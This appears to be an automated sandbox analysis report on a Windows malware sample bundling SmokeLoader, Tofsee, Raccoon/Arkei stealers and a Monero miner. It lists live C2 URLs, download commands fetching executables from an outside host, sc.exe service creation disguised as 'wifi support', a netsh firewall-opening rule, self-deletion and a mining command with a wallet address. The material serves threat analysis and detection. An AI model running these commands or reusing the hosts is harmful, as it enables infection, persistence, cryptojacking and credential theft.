Analysis
-
max time kernel
138s -
max time network
152s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
09/01/2022, 18:04
Static task
static1
General
-
Target
4d12e6e7065174e07cf09a4cc856b3646ff0a5afadff94e364559042f078f16c.exe
-
Size
290KB
-
MD5
0871119792a92dc52c023a389c303908
-
SHA1
33dc1500a14b1019cd253a74d93fbfa4aff6e9ba
-
SHA256
4d12e6e7065174e07cf09a4cc856b3646ff0a5afadff94e364559042f078f16c
-
SHA512
c5dd093ec102e8f35b991fb6bb9c9fbeb52e3ad878f6e3f327dd1a3f2b814610fb23fed601015edf261ab9e89b24a4fde670002518e4e6dc8fca4d4a847a07e8
Malware Config
Extracted
smokeloader
2020
http://host-data-coin-11.com/
http://file-coin-host-12.com/
http://srtuiyhuali.at/
http://fufuiloirtu.com/
http://amogohuigotuli.at/
http://novohudosovu.com/
http://brutuilionust.com/
http://bubushkalioua.com/
http://dumuilistrati.at/
http://verboliatsiaeeees.com/
Extracted
tofsee
patmushta.info
parubey.info
Extracted
raccoon
1.8.4-hotfixs
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 2348 created 2824 2348 WerFault.exe 97 -
Arkei Stealer Payload 7 IoCs
resource yara_rule behavioral1/memory/1040-140-0x0000000000400000-0x0000000002B86000-memory.dmp family_arkei behavioral1/memory/1040-141-0x0000000002C00000-0x0000000002C1C000-memory.dmp family_arkei behavioral1/memory/1932-182-0x0000000004F40000-0x0000000005546000-memory.dmp family_arkei behavioral1/memory/2736-213-0x0000000000E80000-0x000000000123F000-memory.dmp family_arkei behavioral1/memory/2736-215-0x0000000000E80000-0x000000000123F000-memory.dmp family_arkei behavioral1/memory/2736-216-0x0000000000E80000-0x000000000123F000-memory.dmp family_arkei behavioral1/memory/2736-217-0x0000000000E80000-0x000000000123F000-memory.dmp family_arkei -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
LoaderBot executable 1 IoCs
resource yara_rule behavioral1/memory/4052-317-0x0000000001150000-0x00000000015AB000-memory.dmp loaderbot -
Blocklisted process makes network request 1 IoCs
flow pid Process 153 3056 WScript.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 22 IoCs
pid Process 4064 FE56.exe 3120 FE56.exe 2832 1C01.exe 1040 3BDE.exe 908 4833.exe 2392 5208.exe 1936 zgxgugzq.exe 1932 5208.exe 2736 C322.exe 2824 DBDB.exe 1276 FD5E.exe 2476 1A1F.exe 2176 2F4E.exe 1124 extd.exe 1932 extd.exe 1056 setup1.exe 3020 extd.exe 808 setup2.exe 684 extd.exe 4052 setup3.exe 1336 extd.exe 1532 Driver.exe -
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral1/files/0x000500000001ab57-279.dat upx behavioral1/files/0x000500000001ab57-280.dat upx behavioral1/files/0x000500000001ab57-284.dat upx behavioral1/files/0x000500000001ab57-294.dat upx behavioral1/files/0x000500000001ab57-300.dat upx behavioral1/files/0x000500000001ab57-316.dat upx -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C322.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C322.exe -
Deletes itself 1 IoCs
pid Process 3004 Process not Found -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url setup3.exe -
Loads dropped DLL 3 IoCs
pid Process 2736 C322.exe 2736 C322.exe 2736 C322.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\setup3.exe" setup3.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" setup2.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C322.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 2736 C322.exe 2736 C322.exe 2476 1A1F.exe 808 setup2.exe 4052 setup3.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2504 set thread context of 2744 2504 4d12e6e7065174e07cf09a4cc856b3646ff0a5afadff94e364559042f078f16c.exe 68 PID 4064 set thread context of 3120 4064 FE56.exe 71 PID 2392 set thread context of 1932 2392 5208.exe 86 PID 1936 set thread context of 3024 1936 zgxgugzq.exe 90 -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 2348 2824 WerFault.exe 97 1016 1056 WerFault.exe 111 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI FE56.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI FE56.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI FE56.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1C01.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4d12e6e7065174e07cf09a4cc856b3646ff0a5afadff94e364559042f078f16c.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4d12e6e7065174e07cf09a4cc856b3646ff0a5afadff94e364559042f078f16c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1C01.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1C01.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4d12e6e7065174e07cf09a4cc856b3646ff0a5afadff94e364559042f078f16c.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C322.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C322.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3568 timeout.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings cmd.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 153 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2744 4d12e6e7065174e07cf09a4cc856b3646ff0a5afadff94e364559042f078f16c.exe 2744 4d12e6e7065174e07cf09a4cc856b3646ff0a5afadff94e364559042f078f16c.exe 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3004 Process not Found -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 620 Process not Found -
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process 2744 4d12e6e7065174e07cf09a4cc856b3646ff0a5afadff94e364559042f078f16c.exe 3120 FE56.exe 2832 1C01.exe 3004 Process not Found 3004 Process not Found 3004 Process not Found 3004 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeDebugPrivilege 2392 5208.exe Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeDebugPrivilege 1932 5208.exe Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeDebugPrivilege 1276 FD5E.exe Token: SeRestorePrivilege 2348 WerFault.exe Token: SeBackupPrivilege 2348 WerFault.exe Token: SeDebugPrivilege 2348 WerFault.exe Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found Token: SeShutdownPrivilege 3004 Process not Found Token: SeCreatePagefilePrivilege 3004 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2504 wrote to memory of 2744 2504 4d12e6e7065174e07cf09a4cc856b3646ff0a5afadff94e364559042f078f16c.exe 68 PID 2504 wrote to memory of 2744 2504 4d12e6e7065174e07cf09a4cc856b3646ff0a5afadff94e364559042f078f16c.exe 68 PID 2504 wrote to memory of 2744 2504 4d12e6e7065174e07cf09a4cc856b3646ff0a5afadff94e364559042f078f16c.exe 68 PID 2504 wrote to memory of 2744 2504 4d12e6e7065174e07cf09a4cc856b3646ff0a5afadff94e364559042f078f16c.exe 68 PID 2504 wrote to memory of 2744 2504 4d12e6e7065174e07cf09a4cc856b3646ff0a5afadff94e364559042f078f16c.exe 68 PID 2504 wrote to memory of 2744 2504 4d12e6e7065174e07cf09a4cc856b3646ff0a5afadff94e364559042f078f16c.exe 68 PID 3004 wrote to memory of 4064 3004 Process not Found 70 PID 3004 wrote to memory of 4064 3004 Process not Found 70 PID 3004 wrote to memory of 4064 3004 Process not Found 70 PID 4064 wrote to memory of 3120 4064 FE56.exe 71 PID 4064 wrote to memory of 3120 4064 FE56.exe 71 PID 4064 wrote to memory of 3120 4064 FE56.exe 71 PID 4064 wrote to memory of 3120 4064 FE56.exe 71 PID 4064 wrote to memory of 3120 4064 FE56.exe 71 PID 4064 wrote to memory of 3120 4064 FE56.exe 71 PID 3004 wrote to memory of 2832 3004 Process not Found 72 PID 3004 wrote to memory of 2832 3004 Process not Found 72 PID 3004 wrote to memory of 2832 3004 Process not Found 72 PID 3004 wrote to memory of 1040 3004 Process not Found 73 PID 3004 wrote to memory of 1040 3004 Process not Found 73 PID 3004 wrote to memory of 1040 3004 Process not Found 73 PID 3004 wrote to memory of 908 3004 Process not Found 74 PID 3004 wrote to memory of 908 3004 Process not Found 74 PID 3004 wrote to memory of 908 3004 Process not Found 74 PID 3004 wrote to memory of 2392 3004 Process not Found 75 PID 3004 wrote to memory of 2392 3004 Process not Found 75 PID 3004 wrote to memory of 2392 3004 Process not Found 75 PID 908 wrote to memory of 644 908 4833.exe 76 PID 908 wrote to memory of 644 908 4833.exe 76 PID 908 wrote to memory of 644 908 4833.exe 76 PID 908 wrote to memory of 3380 908 4833.exe 78 PID 908 wrote to memory of 3380 908 4833.exe 78 PID 908 wrote to memory of 3380 908 4833.exe 78 PID 908 wrote to memory of 4052 908 4833.exe 81 PID 908 wrote to memory of 4052 908 4833.exe 81 PID 908 wrote to memory of 4052 908 4833.exe 81 PID 908 wrote to memory of 1000 908 4833.exe 82 PID 908 wrote to memory of 1000 908 4833.exe 82 PID 908 wrote to memory of 1000 908 4833.exe 82 PID 908 wrote to memory of 1840 908 4833.exe 84 PID 908 wrote to memory of 1840 908 4833.exe 84 PID 908 wrote to memory of 1840 908 4833.exe 84 PID 2392 wrote to memory of 1932 2392 5208.exe 86 PID 2392 wrote to memory of 1932 2392 5208.exe 86 PID 2392 wrote to memory of 1932 2392 5208.exe 86 PID 908 wrote to memory of 2152 908 4833.exe 88 PID 908 wrote to memory of 2152 908 4833.exe 88 PID 908 wrote to memory of 2152 908 4833.exe 88 PID 2392 wrote to memory of 1932 2392 5208.exe 86 PID 2392 wrote to memory of 1932 2392 5208.exe 86 PID 2392 wrote to memory of 1932 2392 5208.exe 86 PID 2392 wrote to memory of 1932 2392 5208.exe 86 PID 2392 wrote to memory of 1932 2392 5208.exe 86 PID 1936 wrote to memory of 3024 1936 zgxgugzq.exe 90 PID 1936 wrote to memory of 3024 1936 zgxgugzq.exe 90 PID 1936 wrote to memory of 3024 1936 zgxgugzq.exe 90 PID 1936 wrote to memory of 3024 1936 zgxgugzq.exe 90 PID 1936 wrote to memory of 3024 1936 zgxgugzq.exe 90 PID 3004 wrote to memory of 1028 3004 Process not Found 92 PID 3004 wrote to memory of 1028 3004 Process not Found 92 PID 3004 wrote to memory of 1028 3004 Process not Found 92 PID 3004 wrote to memory of 1028 3004 Process not Found 92 PID 3004 wrote to memory of 2548 3004 Process not Found 93 PID 3004 wrote to memory of 2548 3004 Process not Found 93 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4d12e6e7065174e07cf09a4cc856b3646ff0a5afadff94e364559042f078f16c.exe"C:\Users\Admin\AppData\Local\Temp\4d12e6e7065174e07cf09a4cc856b3646ff0a5afadff94e364559042f078f16c.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Users\Admin\AppData\Local\Temp\4d12e6e7065174e07cf09a4cc856b3646ff0a5afadff94e364559042f078f16c.exe"C:\Users\Admin\AppData\Local\Temp\4d12e6e7065174e07cf09a4cc856b3646ff0a5afadff94e364559042f078f16c.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2744
-
-
C:\Users\Admin\AppData\Local\Temp\FE56.exeC:\Users\Admin\AppData\Local\Temp\FE56.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Users\Admin\AppData\Local\Temp\FE56.exeC:\Users\Admin\AppData\Local\Temp\FE56.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3120
-
-
C:\Users\Admin\AppData\Local\Temp\1C01.exeC:\Users\Admin\AppData\Local\Temp\1C01.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2832
-
C:\Users\Admin\AppData\Local\Temp\3BDE.exeC:\Users\Admin\AppData\Local\Temp\3BDE.exe1⤵
- Executes dropped EXE
PID:1040
-
C:\Users\Admin\AppData\Local\Temp\4833.exeC:\Users\Admin\AppData\Local\Temp\4833.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\kjsqovnj\2⤵PID:644
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\zgxgugzq.exe" C:\Windows\SysWOW64\kjsqovnj\2⤵PID:3380
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create kjsqovnj binPath= "C:\Windows\SysWOW64\kjsqovnj\zgxgugzq.exe /d\"C:\Users\Admin\AppData\Local\Temp\4833.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:4052
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description kjsqovnj "wifi internet conection"2⤵PID:1000
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start kjsqovnj2⤵PID:1840
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:2152
-
-
C:\Users\Admin\AppData\Local\Temp\5208.exeC:\Users\Admin\AppData\Local\Temp\5208.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Users\Admin\AppData\Local\Temp\5208.exeC:\Users\Admin\AppData\Local\Temp\5208.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
C:\Windows\SysWOW64\kjsqovnj\zgxgugzq.exeC:\Windows\SysWOW64\kjsqovnj\zgxgugzq.exe /d"C:\Users\Admin\AppData\Local\Temp\4833.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵PID:3024
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:1028
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:2548
-
C:\Users\Admin\AppData\Local\Temp\C322.exeC:\Users\Admin\AppData\Local\Temp\C322.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:2736 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\C322.exe" & exit2⤵PID:644
-
C:\Windows\SysWOW64\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:3568
-
-
-
C:\Users\Admin\AppData\Local\Temp\DBDB.exeC:\Users\Admin\AppData\Local\Temp\DBDB.exe1⤵
- Executes dropped EXE
PID:2824 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 8482⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
C:\Users\Admin\AppData\Local\Temp\FD5E.exeC:\Users\Admin\AppData\Local\Temp\FD5E.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1276
-
C:\Users\Admin\AppData\Local\Temp\1A1F.exeC:\Users\Admin\AppData\Local\Temp\1A1F.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2476
-
C:\Users\Admin\AppData\Local\Temp\2F4E.exeC:\Users\Admin\AppData\Local\Temp\2F4E.exe1⤵
- Executes dropped EXE
PID:2176 -
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2FF0.tmp\2FF1.tmp\2FF2.bat C:\Users\Admin\AppData\Local\Temp\2F4E.exe"2⤵
- Modifies registry class
PID:1704 -
C:\Users\Admin\AppData\Local\Temp\2FF0.tmp\2FF1.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2FF0.tmp\2FF1.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:1124
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31951\123.vbs"3⤵
- Blocklisted process makes network request
PID:3056
-
-
C:\Users\Admin\AppData\Local\Temp\2FF0.tmp\2FF1.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2FF0.tmp\2FF1.tmp\extd.exe "/download" "http://a0617224.xsph.ru/1.exe" "setup1.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:1932
-
-
C:\Users\Admin\AppData\Local\Temp\31951\setup1.exesetup1.exe3⤵
- Executes dropped EXE
PID:1056 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1056 -s 4124⤵
- Program crash
PID:1016
-
-
-
C:\Users\Admin\AppData\Local\Temp\2FF0.tmp\2FF1.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2FF0.tmp\2FF1.tmp\extd.exe "/download" "http://a0617224.xsph.ru/2.exe" "setup2.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:3020
-
-
C:\Users\Admin\AppData\Local\Temp\31951\setup2.exesetup2.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:808
-
-
C:\Users\Admin\AppData\Local\Temp\2FF0.tmp\2FF1.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2FF0.tmp\2FF1.tmp\extd.exe "/download" "http://a0617224.xsph.ru/3.exe" "setup3.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:684
-
-
C:\Users\Admin\AppData\Local\Temp\31951\setup3.exesetup3.exe3⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4052 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:1532
-
-
-
C:\Users\Admin\AppData\Local\Temp\2FF0.tmp\2FF1.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\2FF0.tmp\2FF1.tmp\extd.exe "" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:1336
-
-
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
2Defense Evasion
Disabling Security Tools
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1